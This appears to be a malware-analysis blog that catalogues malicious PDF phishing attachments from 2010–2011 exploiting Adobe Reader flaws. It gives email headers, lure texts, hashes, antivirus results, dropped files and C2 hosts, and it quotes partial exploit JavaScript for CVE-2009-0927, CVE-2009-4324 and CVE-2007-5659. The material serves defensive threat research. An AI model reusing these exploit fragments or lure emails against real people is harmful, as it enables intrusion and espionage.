Clicky

Pages

Showing posts with label CVE-2009-4324. Show all posts
Showing posts with label CVE-2009-4324. Show all posts

Tuesday, June 14, 2011

Jun 13 CVE-2009-4324 PDF navy procurement.pdf from compromised louisvilleheartsurgery.com w Trojan Taidoor

Common Vulnerabilities and Exposures (CVE)number

CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.

  General File Information

File  navy procurement.pdf
File Size  222903
MD5  DF0DE9AD9E5BF00A60F8DE3D37683C5B
Distribution  Email attachment

CLICK HERE SEE ALL OTHER PHISHING MESSAGES SENT VIA THAT SERVER


 The trojaned documents were sent via mail.louisvilleheartsurgery.com (66.147.51.202), which appears to be a legitimate mail server of University of Louisville surgery program, which is outsourced to/hosted at Nuvox / Windstream Email hosting. The server must be misconfigured or compromised and is being actively used as a relay for phishing.

Wednesday, January 19, 2011

Jan 12 CVE-2010-3654 + CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 PDF JANUARY 2011 from a compromised Thai Police account

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3654 Adobe Flash Player 10.1.85.3 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.95.2 and earlier on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

 

CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.  

 

CVE-2009-0927 Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.  

 

CVE-2008-0655 Buffer overflow via specially crafted arguments to Collab.collectEmailInfo

  General File Information

File  JAN 2011.pdf
MD5  F928C39F0BFEBAAF3A5FB149557DDF66
SHA1
  87c17dc9282792906ef41670011c2473c87c9b9b   
File size :  384271
Type:  PDF
Distribution: Email attachment
 

read more...

Friday, November 26, 2010

CVE-2009-4324 CVE-2009-0927 CVE-2008-2992 regional security in east asia.pdf


Common Vulnerabilities and Exposures (CVE)number

This post is to be continued..

CVE-2009-4324

CVE-2009-0927

CVE-2008-2992

  General File Information

File regional security in east asia.pdf
MD5  80e5432f7806564c5fc50738741abf7
SHA1  dc4f71609171e93bb1ad66fb52e8bb330f362a76
File size 37238 bytes
Type:  PDF
Distribution: Email attachment

Download

Thursday, September 9, 2010

Sep 09 CVE-2009-4324 + CVE-2010-1297 + CVE-2009-0927 PDF U.S. economy slips from spoofed henryAron@brookings.org 210.64.253.96



CVE-2009-0927 Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.


Download  as a password protected archive with the original PDf and analysis files/dropped binaries (contact me if you need the password)


-----Original Message-----
From: Henry J. Aaron [mailto:henryAron@brookings.org]
Sent: Thursday, September 09, 2010 9:38 AM
To: XXXXXXXXX
Subject: FW: U.S. economy slips to 4th in WEF's competitiveness rankings

To whom it may concern.

Henry J. Aaron

Senior Fellow, Economic Studies

The Brookings Institution
Headers
Received: (qmail 12137 invoked from network); 9 Sep 2010 13:43:33 -0000
Received: from h96-210-64-253.seed.net.tw (HELO brookings.org) (210.64.253.96)
  by XXXXXXXXXXXX with SMTP; 9 Sep 2010 13:43:33 -0000
From: "Henry J. Aaron"
Subject: FW: U.S. economy slips to 4th in WEF's competitiveness rankings
To: XXXXXXX
Content-Type: multipart/mixed;
    boundary="=_NextPart_2rfkindysadvnqw3nerasdf"; charset="US-ASCII"
MIME-Version: 1.0
Reply-To: h.swain65@yahoo.com
Date: Thu, 9 Sep 2010 21:37:54 +0800
X-Priority: 3
X-Mailer: Microsoft Outlook Express 5.00.2615.200

210.64.253.96

Hostname:    h96-210-64-253.seed.net.tw
ISP:    Digital United Inc.
Organization:    Seednet-TaipeiDP-S
State/Region:    T'ai-pei
City:    Taipei

CVE-2009-4324
CVE-2010-1297
CVE-2009-0927
http://wepawet.cs.ucsb.edu/view.php?hash=47a46ba2220cf6368eb0d42d8a6d40e3&type=js


Thursday, August 26, 2010

Aug 26 CVE-2009-4324 Chess on the High Seas from matthewgebert@yahoo.com 113.30.106.22


Download 43cb55861b7fcf1dfb6968c9ef110bcc Aug2010.pdf as a password protected archive (contact me if you need the password)

From: Matthew Gebert [mailto:matthewgebert@yahoo.com]
Sent: Thursday, August 26, 2010 10:11 PM
To: matthewgebert@yahoo.com
Subject: Chess on the High Seas - Dangerous Times for U.S.-China Relations

The Obama administration's hopes that its warmer approach to Beijing would yield a more fruitful Sino-American relationship have been disappointed. Rather than adopting a more cooperative bearing, Beijing has become increasingly assertive over the past year. Recognizing the resulting detriment to U.S. interests and Asia-Pacific peace and security, the Obama administration is now pushing back. This new direction may convince Beijing to reconsider its recent assertive policies, but for now, the United States and China have entered a period of tense relations, raising the odds of a true crisis. Particularly worrisome is Chinese media coverage of this summer's quarrels, which has been nationalistic and anti-American in tone and content. Such coverage makes conflicts more difficult to resolve, as the Chinese regime cannot afford to look weak in the eyes of an incensed citizenry. Policymakers in both countries should be aware of this dynamic as they approach any additional disputes in the coming months.
Key points in this Outlook:
•    The United States and China have clashed over maritime exercises, with Beijing opposed to Washington asserting its right to exercise in international waters.
•    The Chinese media responded with a stream of nationalistic, anti-American reporting--portraying the United States as an imperial power.
•    Despite China's confidence, there are signs of internal weakness in the People's Republic, with social unrest on the rise
•    The United States should prepare diplomati¬cally and militarily for a potential crisis.

File name:
Aug2010.pdf
Submission date:
2010-08-29 03:33:46 (UTC)
http://www.virustotal.com/file-scan/report.html?id=a74996d152e867a8bc9a7585a622bab3fdf7c792d9ed16d3fd07643bbec2cfff-1283052826
Result:
24 /41 (58.5%)
AntiVir     8.2.4.46     2010.08.28     EXP/Pdfka.otd.2
Antiy-AVL     2.0.3.7     2010.08.26     Exploit/Win32.Pidief
Authentium     5.2.0.5     2010.08.28     PDF/Obfusc.M!Camelot
Avast     4.8.1351.0     2010.08.28     JS:Pdfka-WJ
Avast5     5.0.594.0     2010.08.28     JS:Pdfka-WJ
AVG     9.0.0.851     2010.08.28     Script/Exploit
BitDefender     7.2     2010.08.29     Exploit.PDF-JS.Gen
ClamAV     0.96.2.0-git     2010.08.28     Suspect.PDF.ObfuscatedJS-5
DrWeb     5.0.2.03300     2010.08.29     Exploit.PDF.1386
Emsisoft     5.0.0.37     2010.08.28     Exploit.Win32.Pidief!IK
eTrust-Vet     36.1.7823     2010.08.27     PDF/Utild.A
F-Prot     4.6.1.107     2010.08.28     JS/ShellCode.AV.gen
F-Secure     9.0.15370.0     2010.08.28     Exploit.PDF-JS.Gen
GData     21     2010.08.29     Exploit.PDF-JS.Gen
Ikarus     T3.1.1.88.0     2010.08.28     Exploit.Win32.Pidief
Kaspersky     7.0.0.125     2010.08.29     Exploit.Win32.Pidief.dcw
Microsoft     1.6103     2010.08.28     Exploit:Win32/Pdfjsc.FE
NOD32     5405     2010.08.28     JS/Exploit.Pdfka.OAQ
Norman     6.05.11     2010.08.28     PDF/Exploit.EK
nProtect     2010-08-28.01     2010.08.28     Exploit.PDF-JS.Gen
Panda     10.0.2.7     2010.08.28     Exploit/PDF.Gen.B
Sophos     4.56.0     2010.08.28     Troj/PDFJs-LP
Sunbelt     6808     2010.08.29     Exploit.PDF-JS.Gen (v)
TrendMicro-HouseCall     9.120.0.1004     2010.08.29     Expl_ShellCodeSM
Additional information
Show all
MD5   : 43cb55861b7fcf1dfb6968c9ef110bcc

PDF
Metadata
ModifyDate>2009-12-22T11:36:33+08:00
CreateDate>2009-07-08T10:53:46+08:00
MetadataDate>2009-12-22T11:36:33+08:00


Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=43cb55861b7fcf1dfb6968c9ef110bcc&type=js

Vicheck
https://www.vicheck.ca/md5query.php?hash=43cb55861b7fcf1dfb6968c9ef110bcc

Headers

Received: from n9.bullet.mail.ac4.yahoo.com (HELO n9.bullet.mail.ac4.yahoo.com) (76.13.13.237)
  by XXXXXXXX with SMTP; 27 Aug 2010 02:11:07 -0000
Received: from [76.13.13.26] by n9.bullet.mail.ac4.yahoo.com with NNFMP; 27 Aug 2010 02:11:07 -0000
Received: from [67.195.9.82] by t3.bullet.mail.ac4.yahoo.com with NNFMP; 27 Aug 2010 02:11:06 -0000
Received: from [98.137.27.128] by t2.bullet.mail.gq1.yahoo.com with NNFMP; 27 Aug 2010 02:11:05 -0000
Received: from [127.0.0.1] by omp202.mail.gq1.yahoo.com with NNFMP; 27 Aug 2010 02:11:05 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 802667.36531.bm@omp202.mail.gq1.yahoo.com
Received: (qmail 72747 invoked by uid 60001); 27 Aug 2010 02:11:04 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1282875064; bh=l9AXsT5C8sF+Wj3+wZuf66KGHc9tCySFLnfUCWLNbP4=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=5lAniIl4dUviz+2ztqdLBTUv2dJJosRNUFwUA6v5b6Bv91c0xc3X2+iQi0lmA/u2zhBbdkpa/7kkRFxOwQ37Yug0Yz87x46EFqWnc7nj6NryiKtw5IwQQrmjbYis5+iUrM0+vIGFWDsafRccUMM2JLMcMmyuAwtWo2V306eDxuY=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type;
  b=fyoCJ/7uWzk719SN6brIlyQpRM7DTUGHl3avD700M0W5g/8I8sy2taVIo3hUOtw5hJpy7AK7cB8uwMny2YQl/5gnaCSvogE9ZyOkTPe8VMYe+TCNJzOjcYSTpvWwCyY/HxWA/PM3pikcpAjWICDGaCGteXVewpEd7/UyO+F00eA=;
Message-ID: <520863.70331.qm@web120012.mail.ne1.yahoo.com>
X-YMail-OSG: Cg7zbwIVM1n3PDFvLIg7lltCnqUSL4y_NlzOFZE1zbiyDxr
 85gBGwOK1IbPQvo.9Hs2KWuieNkJFhApgm0ANFIB7L.bxG2QGqH7_XY9oix7
 hlESdD6YZrxr3Vw7Z5IbQUYLcVXpHI17096rHp_WSYX7foGEcAtyhxI_d7m9
 2.rOb6nWEuT6n_aOT3YujB85FSo9wvI8FRD4LJaA-
Received: from [113.30.106.22] by web120012.mail.ne1.yahoo.com via HTTP; Thu, 26 Aug 2010 19:11:04 PDT
X-Mailer: YahooMailClassic/11.3.2 YahooMailWebService/0.8.105.279950
Date: Thu, 26 Aug 2010 19:11:04 -0700
From: Matthew Gebert
Subject: Chess on the High Seas - Dangerous Times for U.S.-China Relations
To: matthewgebert@yahoo.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-52491509-1282875064=:70331"


 113.30.106.22
Hostname:    113.30.106.22
ISP:    HCLC
Organization:    HCLC
Assignment:    Static IP
Country:    Korea, Republic of

 ============================================================
 Windows XP SP2 Adobe Reader 9.1

Created files 
%tmp%\asrss.exe   0 bytes

It needs to be tested on a different VM perhaps, it crashes, so it is hard to tell without further testing or static analysis of the payload

Monday, August 16, 2010

Aug 16 CVE-2009-4324 PDF Communist China remove missiles from Qiying526@ntu.edu.tw (140.119.170.173)


Update 3  See here http://extraexploit.blogspot.com/search/label/CVE-2009-4324 more about CVE-2009-4324, it is a classic case. 

Update2. It certainly does NOT have CVE-2010-1297. Thanks to Tyler McLeod (Vicheck.ca) and Giuseppe Bonfa (evilcry ) for checking and confirmation.The presence of j_exp function made it similar to other files exploiting CVE-2010-1297 but this one has just this piece of code without apparent reason (malware writer mistake?) It is also not clear why it is checking versions.

Update. Ok, exploitation of CVE-2010-1297 is debatable. But what is it? 


Download :ATT72558.pdf 6227e1594775773a182e1b631db5f6bb as a password protected archive (contact me if you need the password)

各位師長:

附檔為新修改之中共撤除海峽對岸飛彈的研析
,請查收。

奕伶敬上

Friday, August 13, 2010

Aug 13 CVE-2009-4324 PDF Letter



Download :53c39496579bcbda962d93734552397b info.pdf as a password protected archive (contact me if you need the password)

Download analysis files by Tom 

From spoofed address.

Headers

Received: from B-A7F64A4BB7EC4 (60-251-61-88.HINET-IP.hinet.net [60.251.61.88])
    by msr40.hinet.net (8.9.3/8.9.3) with ESMTP id KAA16513
    for xxxxxxxxxxxxxxxx; Fri, 13 Aug 2010 10:33:21 +0800 (CST)
Reply-To: xxxxxxxxxxxxxxxxxxxxxx
From: xxxxxxxxxxxxxxxxxxxxxxxxx
To: xxxxxxxxxxxxxxxx
Subject: Letter from XXX
Date: Fri, 13 Aug 2010 10:33:19 +0800
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_10081310330437422578431_000"
X-Priority: 3
X-Mailer: DreamMail 4.4.1.0

60.251.61.88
Hostname:    60-251-61-88.hinet-ip.hinet.net
ISP:    CHTD, Chunghwa Telecom Co., Ltd.
Organization:    CHTD, Chunghwa Telecom Co., Ltd.
Assignment:    Static IP
Country:    Taiwan 

File name:info.pdf
http://www.virustotal.com/file-scan/report.html?id=e27948456c74ea0ed36a18091a66bd5641a5d1033f8d7893803475a661105bc9-1282002524
Submission date:2010-08-16 23:48:44 (UTC)
13 /42 (31.0%)
Authentium     5.2.0.5     2010.08.16     JS/Pdfka.V
Avast     4.8.1351.0     2010.08.16     JS:Pdfka-gen
Avast5     5.0.332.0     2010.08.16     JS:Pdfka-gen
AVG     9.0.0.851     2010.08.16     Exploit.PDF
BitDefender     7.2     2010.08.17     Exploit.PDF-JS.Gen
DrWeb     5.0.2.03300     2010.08.17     Exploit.PDF.1301
eTrust-Vet     36.1.7794     2010.08.16     PDF/CVE-2010-1297.B!exploit
F-Prot     4.6.1.107     2010.08.16     JS/Pdfka.V
F-Secure     9.0.15370.0     2010.08.17     Exploit.PDF-JS.Gen
GData     21     2010.08.17     Exploit.PDF-JS.Gen
Kaspersky     7.0.0.125     2010.08.16     Exploit.JS.Pdfka.cqx
Norman     6.05.11     2010.08.16     JS/Shellcode.IZ
nProtect     2010-08-16.02     2010.08.16     Exploit.PDF-JS.Gen
MD5   : 53c39496579bcbda962d93734552397b

 

CVE-2009-4324

Analysis files from Tom

The exe-file has been ciphered: xor ah,C1, rol ah,1.
List of included files
  • exe_decrypt.bin
  • exe_encrypt.bin
  • new_pdf.pdf
  • shell_code.dec
File name:exe_decrypt.bin
http://www.virustotal.com/file-scan/report.html?id=a4a596451d8d29a95ba11a5d9f0be4659f8e3acc6f6730c0b77fc9da07ccd154-1283224992
Submission date:
7/ 43 (16.3%)
AhnLab-V3    2010.08.31.00    2010.08.31    Win-Trojan/Agent.36864.BOH
AVG    9.0.0.851    2010.08.30    Generic18.BHJW
Fortinet    4.1.143.0    2010.08.30    W32/RSdroper.B!tr
McAfee    5.400.0.1158    2010.08.31    Downloader-BIJ
McAfee-GW-Edition    2010.1B    2010.08.31    Downloader-BIJ
Microsoft    1.6103    2010.08.30    TrojanDownloader:Win32/Buzus.C
Norman    6.05.11    2010.08.30    W32/Malware
Additional information
Show all
MD5   : ff188adc3be1cfb178c04e66fdfb31a8

File name:
exe_encrypt.bin
http://www.virustotal.com/file-scan/report.html?id=02b2735b9de1bab65d9839971e953de647aa8faec1bee4ea8a09ad9bab1e6e40-1283225061
Result:
1/ 43 (2.3%)
SUPERAntiSpyware    4.40.0.1006    2010.08.31    Rogue.Agent/Gen-Nullo[BIN]
MD5   : 79b7652c371afcc3ef3c449e8c6c4d61

File name:
shell_code.dec
http://www.virustotal.com/file-scan/report.html?id=081b1ac4f134c20daac762aaaee21184d2953ebe01988ce341622a400a9f9a3d-1283225511
Result:
7/ 43 (16.3%)
AVG    9.0.0.851    2010.08.30    Exploit.PDF
Kaspersky    7.0.0.125    2010.08.30    Exploit.JS.Pdfka.cqx
Microsoft    1.6103    2010.08.30    Exploit:Win32/Pdfjsc.HH
Norman    6.05.11    2010.08.30    JS/Shellcode.IZ
TrendMicro    9.120.0.1004    2010.08.30    JS_SHELLCODE.SM
TrendMicro-HouseCall    9.120.0.1004    2010.08.31    JS_SHELLCODE.SM
VBA32    3.12.14.0    2010.08.30    Exploit.JS.Pdfka.cqx
MD5   : 604585dc238662462b1b1efce8fb924c

File name:
new_pdf.pdf


Tuesday, August 3, 2010

Aug 3 CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659 Please confirm from 94255015@nccu.edu.tw 140.119.166.13



Download 350924123cbf1b126f4e38335ed6660d + files dropped as a password protected archive (contact me if you need the password)





-----Original Message-----
From: 94255015 [mailto:94255015@nccu.edu.tw]
Sent: Tuesday, August 03, 2010 11:24 AM
To: xxxxxxxxx
Subject: Please confirm~


Dear xxxxxxxxxxxxxxxx:

I'm very sorry to bother you,but please to make sure you have attended the meetings,and to confirm the agenda is correct.Thank you very much!

Your sincerely,
Aaron

 Headers
Received: (qmail 6491 invoked from network); 3 Aug 2010 15:08:01 -0000
Received: from alumni2.nccu.edu.tw (HELO alumni2.nccu.edu.tw) (140.119.166.13)
  by xxxxxxxxxxxx
Received: By OpenMail Mailer;Tue, 03 Aug 2010 23:24:24 +0800 (CST)
From: "94255015" <94255015@nccu.edu.tw>
Reply-To: 94255015@nccu.edu.tw
Subject: Please confirm~
Message-ID: <1280849064.24992.94255015@nccu.edu.tw>
To: "xxxxxxxxx
Date: Tue, 3 Aug 2010 23:24:24 +0800
MIME-Version: 1.0
Return-Path: 94255015@nccu.edu.tw
Content-Type: multipart/mixed; boundary="---=Z8PIZ9?YwlMVFpoZJ2WvJ=sMbD"
 
140.119.166.13
 Hostname:    alumni2.nccu.edu.tw
ISP:    MOEC
Organization:    National Chengchi University
Proxy:    None detected
Type:    Broadband
Country:    Taiwan


File name:conference_program.pdf
http://www.virustotal.com/file-scan/report.html?id=220a1b24e02c2757eccebb6827b4021d570b0f662dd1b0772c22c96b8f6b7c1d-1282772703
Submission date:
2010-08-25 21:45:03 (UTC)
Current status:
17 /42 (40.5%)
Authentium     5.2.0.5     2010.08.25     PDF/Obfusc.G!Camelot
Avast     4.8.1351.0     2010.08.25     JS:Pdfka-gen
Avast5     5.0.594.0     2010.08.25     JS:Pdfka-gen
BitDefender     7.2     2010.08.25     Exploit.PDF-JS.Gen
ClamAV     0.96.2.0-git     2010.08.25     Heuristics.PDF.ObfuscatedNameObject
DrWeb     5.0.2.03300     2010.08.25     Exploit.PDF.1302
Emsisoft     5.0.0.37     2010.08.25     HTML.Malicious!IK
eSafe     7.0.17.0     2010.08.25     PDF.Exploit.4
F-Prot     4.6.1.107     2010.08.25     JS/ShellCode.S
F-Secure     9.0.15370.0     2010.08.25     Exploit.PDF-JS.Gen
GData     21     2010.08.25     Exploit.PDF-JS.Gen
Ikarus     T3.1.1.88.0     2010.08.25     HTML.Malicious
Kaspersky     7.0.0.125     2010.08.25     Exploit.JS.Pdfka.cri
nProtect     2010-08-25.02     2010.08.25     Exploit.PDF-Name.Gen
VBA32     3.12.14.0     2010.08.25     Exploit.JS.Pdfka.cri
Additional information
Show all
MD5   : 350924123cbf1b126f4e38335ed6660d


CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659

____________________________________
CVE-2009-0927

for (i = 0; i < buffersize; i ++ ){
buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');";
eval(strtmp3);
---------------------------------------------------------
CVE-2009-4324

for (i = 0; i < 200; i ++ )memory[i] = block + shellcode;
try {
this .media.newPlayer(null);
}
catch (e){
}
util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570,
2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570
, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date());
}
----------------------------------------------------------------------
CVE-2007-5659

if (app.viewerVersion >= 6.0){
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : plin

Wepawet
http://wepawet.iseclab.org/view.php?hash=350924123cbf1b126f4e38335ed6660d&type=js 

 ---------------------

Windows XP SP2 Adobe Reader 9.11

Created files
%userprofile%\Application Data\diskchk.exe  379E0B3E2C4778075511C4C1E62C0C65
%userprofile%\Local Settings\Temp\2.tmp 
C:\a.pdf 

a.pdf

File name:
diskchk.exe
http://www.virustotal.com/file-scan/report.html?id=5ab0bc8ef4f276e2b8a8fa989aa8e35947f1f1a2694f786ab02d4d4b7eeab2d6-1282823469
Submission date:
2010-08-26 11:51:09 (UTC)
Result:
10/ 40 (25.0%)
AntiVir    8.2.4.46    2010.08.26    TR/Crypt.ZPACK.Gen
Avast    4.8.1351.0    2010.08.26    Win32:Malware-gen
Avast5    5.0.594.0    2010.08.26    Win32:Malware-gen
AVG    9.0.0.851    2010.08.26    BackDoor.Generic12.BUOQ
BitDefender    7.2    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
CAT-QuickHeal    11.00    2010.08.24    (Suspicious) - DNAScan
F-Secure    9.0.15370.0    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
GData    21    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
nProtect    2010-08-26.01    2010.08.26    Trojan/W32.Agent.28160.MA
Sophos    4.56.0    2010.08.26    Troj/FkIntel-A
Additional information
Show all
MD5   : 379e0b3e2c4778075511c4c1e62c0c65


Anubis report
http://anubis.iseclab.org/?action=result&task_id=1f9a7a78ebc252b74a1362b81134726d7




DNS 
audnted.flinkup.org 220.246.73.187
facecache.mypicture.info 220.246.73.187
microinfo.3utilities.com 255.255.255.255

220.246.73.187
http://www.robtex.com/ip/220.246.73.187.html#whois
Hostname:    187.73.246.220.static.netvigator.com
ISP:    PCCW Limited
Organization:    PCCW Limited
Type:    Broadband
Assignment:    Dynamic IP
Country:    Hong Kong
City:    Kings Park
http://www.robtex.com/dns/187.73.246.220.static.netvigator.com.html#graph



Wednesday, July 28, 2010

Jul 28 CVE-2009-4324 PDF 990729 Summary of Network Intelligence from ljw@gsn.gov.tw 210.69.115.235


 Download 738af108a6edd46536492b1782589a04 -990729.pdf as a password protected archive (contact me if you need the password)



From: ljw [mailto:ljw@gsn.gov.tw]
Sent: Wednesday, July 28, 2010 11:24 PM
To: agefr6nt@yahoo.com.tw
Subject: 990729網情彙編

 From: ljw [mailto: ljw@gsn.gov.tw]Sent: Wednesday, July 28, 2010 11:24 PMTo: agefr6nt@yahoo.com.twSubject: 990729  Summary of Network Intelligence

Headers

Received: from mail2000.tccg.gov.tw (HELO mail2000.tccg.gov.tw) (210.69.115.235)
  by XXXXXXXXXXXXX
Received: from 192.168.4.154
    by mail2000.tccg.gov.tw with Mail2000 ESMTP Server V4.00S(4662:0:AUTH_LOGIN)
    (envelope-from ); Thu, 29 Jul 2010 17:28:08 +0800 (CST)
Return-Path:
Message-ID: <1975e5623c$23fce32a$0ae1d8b4@nccu212af2ce2>
From: "ljw"
To: ,
BCC:XXXXXXXXXXX
Subject: =?big5?B?OTkwNzI5uvSxobdKvXM=?=
Date: Thu, 29 Jul 2010 11:24:22 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0033_01CB2F10.990CB480"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
 (210.69.115.235)
Hostname:    mail2000.tccg.gov.tw
ISP:    GSN, Taiwan Government Service Network.
Organization:    Taichung City Government
Country:    Taiwan


File name:
http://www.virustotal.com/file-scan/report.html?id=c1d9cd02799bbb45aa6a37a16f2da1dca86f55e474b0a33e0034232c176b5f99-1280460987
-990729.pdf
Submission date:
2010-07-30 05:36:27 (UTC)
12 /42 (28.6%)
Authentium     5.2.0.5     2010.07.30     JS/Pdfka.V
Avast     4.8.1351.0     2010.07.30     JS:Pdfka-gen
Avast5     5.0.332.0     2010.07.30     JS:Pdfka-gen
AVG     9.0.0.851     2010.07.29     Exploit.PDF
BitDefender     7.2     2010.07.30     Exploit.PDF-JS.Gen
eTrust-Vet     36.1.7750     2010.07.30     PDF/CVE-2010-1297.B!exploit  - NOT
F-Prot     4.6.1.107     2010.07.30     JS/Pdfka.V
F-Secure     9.0.15370.0     2010.07.30     Exploit.PDF-JS.Gen
GData     21     2010.07.30     Exploit.PDF-JS.Gen
McAfee-GW-Edition     2010.1     2010.07.29     Heuristic.BehavesLike.PDF.Suspicious.O
Norman     6.05.11     2010.07.29     JS/Shellcode.IZ
nProtect     2010-07-30.01     2010.07.30     Exploit.PDF-JS.Gen
Additional information
Show all
MD5   : 738af108a6edd46536492b1782589a04

==============================================================
Windows XP SP2 Adobe Reader 9.1

Files created
%tmp%\jqc.exe
%tmp%\1,pdf 

1.pdf
http://www.virustotal.com/file-scan/report.html?id=26a0711f9cb1dc0d53e524ed9b90f3356c8e5c4c4b6da942d8371662e800fcd5-1282796454


jqc.exe
http://www.virustotal.com/file-scan/report.html?id=7224943665fb630f371aeef1f8d6402ce4e53150c1fd8ff044977c659b514fdd-1282796115
AntiVir 8.2.4.38 2010.08.25 BDS/Ixeshe.A.20
Authentium 5.2.0.5 2010.08.26 W32/Heuristic-245!Eldorado
Avast 4.8.1351.0 2010.08.25 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.08.25 Win32:Rootkit-gen
BitDefender 7.2 2010.08.26 Trojan.Generic.4549982
CAT-QuickHeal 11.00 2010.08.24 Backdoor.Ixeshe.a
ClamAV 0.96.2.0-git 2010.08.26 PUA.Packed.ASPack
Emsisoft 5.0.0.37 2010.08.26 Backdoor.Win32.Ixeshe!IK
F-Prot 4.6.1.107 2010.08.26 W32/Heuristic-245!Eldorado
F-Secure 9.0.15370.0 2010.08.26 Trojan.Generic.4549982
Fortinet 4.1.143.0 2010.08.25 W32/PdfExDr.B!tr
GData 21 2010.08.26 Trojan.Generic.4549982
Ikarus T3.1.1.88.0 2010.08.26 Backdoor.Win32.Ixeshe
Microsoft 1.6103 2010.08.25 Backdoor:Win32/Ixeshe.A
NOD32 5397 2010.08.25 probably a variant of Win32/Ixeshe.A
nProtect 2010-08-25.02 2010.08.25 Trojan.Generic.4549982
Panda 10.0.2.7 2010.08.25 Trj/CI.A
PCTools 7.0.3.5 2010.08.26 Trojan.Gen
Sophos 4.56.0 2010.08.26 Mal/PdfExDr-B
Sunbelt 6795 2010.08.26 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.08.26 Trojan.Gen
TrendMicro 9.120.0.1004 2010.08.26 TSPY_AGENT.AVEP
TrendMicro-HouseCall 9.120.0.1004 2010.08.26 TSPY_AGENT.AVEP
VBA32 3.12.14.0 2010.08.25 Trojan-Downloader.Dreamtouch.xb
VirusBuster 5.0.27.0 2010.08.25 Trojan.Ixeshe.Z
Additional informationShow all 
MD5   : d27e5643f1e5422be6cba2d98506ebbf



120.126.54.189
Hostname:    ymu054-189.ym.edu.tw
ISP:    Ministry of Education Computer Center
Organization:    Ministry of Education Computer Center
Country:    Taiwan

  • Outgoing Connections





    • HTTP Data





      • Method: GET
      • Url: 120.126.54.189/AWS7838.jsp?2al314Le1g0315QgjaZ/I5Rojs9Khs9fI/xoIOmM=k+ojnhT
      • HTTP Version: HTTP/1.1



        • Header Data




          • x_bigfix_client_string: 2al314Le1g0315QgjaZ/qDAA
          • User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
          • Host: oltnsck.dnsrd.com
          • Connection: Keep-Alive

 http://www.robtex.com/dns/oltnsck.dnsrd.com.html

oltnsck.dnsrd.com

Incoming mail for oltnsck.dnsrd.com is handled by one mail server at dnsrd.com. Oltnsck.dnsrd.com has one IP number (120.126.34.94) , but the reverse is ymu034-094.ym.edu.tw.
Ymu034-094.ym.edu.tw point to the same IP. Oltnsck.dnsrd.com use this as a mail server.

dnsrd.com

Dnsrd.com is a domain controlled by three name servers at changeip.org. Two of them are on the same IP network. The primary name server is ns3.changeip.org. Incoming mail for dnsrd.com is handled by one mail server at changeip.com. Dnsrd.com has one IP number (204.16.173.30).

More information

oltnsck.dnsrd.com is hosted on a server in Taiwan


Transport Protocol: TCP
Remote Address: 140.112.155.252
Remote Port: 80
Protocol: HTTP
Connection Established: 0
Socket: 2020


Hostname:    140.112.155.252
ISP:    National Taiwan University
    Organization:    National Taiwan University
    Country:    Taiwan

Wednesday, July 14, 2010

Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines

CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
 
 Download 51d54fce1d57a7228a4ed8d193f9f2bf and 0f5d42aa99b17eabddc19a46013b517b  as a password protected archive (please contact me if you need the password)

From: XXXXXXXXXXXXXXXXXX
Sent: Wednesday, July 14, 2010 9:42 AM
To: XXXXXXXX
